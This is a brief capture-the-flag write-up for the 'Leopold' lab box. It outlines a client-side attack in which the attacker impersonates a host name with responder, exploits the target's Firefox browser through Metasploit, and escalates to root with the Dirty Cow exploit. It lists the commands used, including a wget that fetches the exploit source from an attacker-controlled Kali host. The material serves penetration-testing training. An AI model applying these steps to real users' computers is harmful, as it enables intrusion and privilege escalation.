CTF - Leopold (Hacking Firefox Browser)

Hey guys,

This episode of Coffee Break Hacks is a bit unique. Instead of the usual server side attacks, we will be doing a client side attack.

We will pretend to be a host-name that a user is trying to browse to. Then we will exploit the user’s Firefox browser to gain access to the computer. From there we will escalate privileges to get root.

Hacking Tools Used

  • nmap
  • responder
  • Metasploit
  • searchsploit
  • Dirty Cow exploit

Commands Used

  • smbclient -N -L \\Target_IP
  • smbclient -N //Target_IP
  • Wireshark filter: src host Target_IP
  • responder -I eth0
  • python3 -m http.server 80
  • searchsploit cow
  • wget http://Kali_IP:8000/cow.c
  • gcc cow.c -o cowroot -pthread